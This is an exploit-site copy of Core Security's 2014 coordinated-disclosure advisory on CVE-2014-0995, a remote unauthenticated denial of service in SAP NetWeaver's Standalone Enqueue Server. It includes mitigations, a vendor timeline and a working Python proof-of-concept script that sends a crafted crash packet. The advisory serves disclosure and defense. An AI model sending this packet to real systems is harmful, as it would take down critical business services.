Search for hundreds of thousands of exploits

"SAP NetWeaver Enqueue Server - Denial of Service"

Author

Exploit author

"Core Security"

Platform

Exploit platform

windows

Release date

Exploit published date

2014-10-17

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability

1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL:
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release

2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995

3. **Vulnerability Description**

        SAP Netweaver [1] is a technology platform for building and
integrating SAP business
        applications. A vulnerability has been found in SAP Netweaver
that could allow an
        unauthenticated, remote attacker to create denial of service
conditions. The vulnerability
        is triggered by sending a specially crafted SAP Enqueue Server
packet to remote TCP port 32NN
        (NN being the SAP system number) of a host running the
"Standalone Enqueue Server" service, part
        of SAP Netweaver Application Server ABAP/Java. The "Standalone
Enqueue Server" is a critical
        component of a SAP Netweaver installation in terms of
availability, rendering the whole SAP
        system unresponsive.
    
4. **Vulnerable Packages**

   . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
   . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).
  
    Other versions are probably affected too, but they were not checked.

5. **Vendor Information, Solutions and Workarounds**

        Martin Gallo proposed the following actions to mitigate the
impact of the vulnerabilities:

        Restrict access to the Standalone Enqueue service by configuring
Access Control Lists [4] and to
        the Standalone Enqueue Service TCP port 32XX (XX is the instance
number).
    
        SAP published a security note [3] with the fix.
    
6. **Credits**

      This vulnerability was discovered and researched by Martin Gallo
from Core Security Consulting
      Services. The publication of this advisory was coordinated by
Joaquín Rodríguez Varela from Core
      Advisories Team.
    
7. **Technical Description / Proof of Concept Code**

      When the trace level of the service is configured to stop logging
when a pattern is found [2], the
      service does not properly control the amount of recursion
resulting in a stack overflow exception.
      The vulnerability can be triggered remotely by setting the trace
level with a wildcard Trace Pattern.
      This vulnerability could allow a remote, unauthenticated attacker
to conduct a denial of service
      attack against the vulnerable systems, rendering the Enqueue
Server unavailable.
      
      The following python code can be used to trigger the vulnerability:
    
7.1. **Proof of Concept**

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))

print "[*] Sending crash packet"

crash = '\xab\xcd\xe1\x23'  # Magic bytes
crash+= '\x00\x00\x00\x00'  # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length
crash+= '\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00'  # Version
crash+= '#EAA'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00'  # Len
crash+= '\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC
crash+= '#EAE'  # Admin Eye-catcher
crash+= '\x01\x04\x00\x00'  # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level
crash+= '\x01'  # Logging
crash+= '\x01\x40\x00\x00'  # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns
crash+= '\x00\x00\x00\x25#EAH'  # Trace Eye-catcher
crash+= '\x01*\x00'  # Trace Pattern
crash+= '#EAD'  # Trace Eye-catcher

send_packet(connection, crash)
print "[*] Crash sent !"
-----/

8. **Report Timeline**

. 2014-06-02:

        Initial notification sent to SAP, including technical
description to reproduce the
        vulnerability. Publication date set to Jun 30, 2014.        

. 2014-06-03:

        Vendor notifies that the tracking number 1153917-2014 was
created for this issue.

. 2014-06-26:
        
        Core Security requests SAP to inform the status of the advisory.

. 2014-06-30:

        The vendor informs they were not able to reproduce the issue and
they request additional
        details and a proof of concept.

. 2014-06-30:
        
        Core Security sends SAP a full description of the vulnerability
including a python script
        to trigger it.
      
. 2014-07-11:
        
        Core Security asks if the vendor was able to trigger the
vulnerability. Additinally we
        requested to set a publication date for the advisory based on
the release of a fix.
      
. 2014-07-14:

        The vendor informs they were able to reproduce the issue but
they will not be able to provide
        a timeline for the fix at the time. They inform they will work
with high priority on it and
        will inform us of the planned fix release date.
      
. 2014-08-12:
        
        Core Security asks if the vendor was able to develop a fix and
if they have a possible timeline
        for its availability.
      
. 2014-08-13:

        The vendor informs that the fix is undergoing quality checks.
They also inform that they can't
        provide an exact date of publication yet. They also request a 3
months grace period once the
        patch is available.
      
. 2014-08-13:
        
        Core Security informs SAP that after we get notice that the fix
is available to the public we will
        publish the advisory accordingly and will not wait for the 3
months of grace as requested because
        that's not our proceeding policy.
      
. 2014-08-18:

        The vendor informs that the fix is going to be released with the
October patch day, on Tuesday the
        14th, of 2014.
      
. 2014-10-14:

        The vendor publishes the fix under the security note 2042845.

. 2014-10-15:

        Core Security releases the advisory.
      
9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx.
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.
    
10. **About CoreLabs**

        CoreLabs, the research center of Core Security, is charged with
anticipating
        the future needs and requirements for information security
technologies.
        We conduct our research in several important areas of computer
security
        including system vulnerabilities, cyber attack planning and
simulation,
        source code auditing, and cryptography. Our results include problem
        formalization, identification of vulnerabilities, novel
solutions and
        prototypes for new technologies. CoreLabs regularly publishes
security
        advisories, technical papers, project information and shared
software
        tools for public use at: http://corelabs.coresecurity.com.
    
11. **About Core Security**

        Core Security enables organizations to get ahead of threats with
security
        test and measurement solutions that continuously identify and
demonstrate
        real-world exposures to their most critical assets. Our
customers can
        gain real visibility into their security standing, real
validation of
        their security controls, and real metrics to more effectively
secure their
        organizations.
        
        Core Security's software solutions build on over a decade of trusted
        research and leading-edge threat expertise from the company's
Security
        Consulting Services, CoreLabs and Engineering groups. Core Security
        can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
    
12. **Disclaimer**

        The contents of this advisory are copyright (c) 2014 Core
Security and (c) 2014 CoreLabs, and
        are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States) License:
        http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

        This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
       
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Release DateTitleTypePlatformAuthor
2018-10-05"D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities"webappsphp"Core Security"
2018-07-27"SoftNAS Cloud < 4.0.3 - OS Command Injection"webappsphp"Core Security"
2018-07-13"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities"webappshardware"Core Security"
2018-02-22"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities"webappsjsp"Core Security"
2018-02-14"Dell EMC Isilon OneFS - Multiple Vulnerabilities"webappslinux"Core Security"
2017-06-28"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities"webappslinux"Core Security"
2017-05-10"SAP SAPCAR 721.510 - Heap Buffer Overflow"doslinux"Core Security"
2016-11-22"TP-LINK TDDP - Multiple Vulnerabilities"doshardware"Core Security"
2016-08-10"SAP SAPCAR - Multiple Vulnerabilities"doslinux"Core Security"
2016-03-16"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow"dosfreebsd_x86-64"Core Security"
2015-12-09"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)"remotewindows"Core Security"
2015-07-08"AirLive (Multiple Products) - OS Command Injection"webappshardware"Core Security"
2015-07-08"AirLink101 SkyIPCam1620W - OS Command Injection"webappshardware"Core Security"
2015-05-26"Sendio ESP - Information Disclosure"webappsjsp"Core Security"
2015-03-18"Fortinet Single Sign On - Stack Overflow"doswindows"Core Security"
2015-01-29"FreeBSD - Multiple Vulnerabilities"dosfreebsd"Core Security"
2015-01-26"Android WiFi-Direct - Denial of Service"dosandroid"Core Security"
2014-11-24"Advantech EKI-6340 - Command Injection"webappscgi"Core Security"
2014-10-17"SAP NetWeaver Enqueue Server - Denial of Service"doswindows"Core Security"
2014-04-17"SAP Router - Timing Attack Password Disclosure"remotehardware"Core Security"
2014-03-12"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities"dosmultiple"Core Security"
2014-02-06"Publish-It 3.6d - Buffer Overflow"doswindows"Core Security"
2013-12-17"Microsoft Windows Kernel - 'win32k.sys' Integer Overflow (MS13-101)"doswindows"Core Security"
2013-12-11"IcoFX 2.5.0.0 - '.ico' Buffer Overflow (PoC)"doswindows"Core Security"
2013-11-08"Vivotek IP Cameras - RTSP Authentication Bypass"webappshardware"Core Security"
2013-10-02"PinApp Mail-SeCure 3.70 - Access Control Failure"locallinux"Core Security"
2013-09-09"Sophos Web Protection Appliance - Multiple Vulnerabilities"webappslinux"Core Security"
2013-08-29"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities"doshardware"Core Security"
2013-08-07"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities"webappshardware"Core Security"
2013-08-02"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities"webappshardware"Core Security"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/35000/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.